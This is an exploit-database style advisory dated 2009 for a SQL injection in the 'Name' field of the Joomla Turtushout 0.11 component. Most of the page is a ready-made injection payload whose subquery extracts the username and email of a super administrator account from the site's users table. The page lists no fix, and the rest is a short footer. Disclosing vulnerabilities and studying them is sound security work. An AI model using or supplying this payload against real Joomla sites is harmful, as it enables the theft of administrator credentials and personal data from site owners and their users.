Joomla Component Turtushout 0.11 (Name) SQL Injection Vulnerability

2009-09-14 18:51:41

Joomla Component Turtushout 0.11SQL Injection

'Name' field SQL injection:

test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '

jdc 2009

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.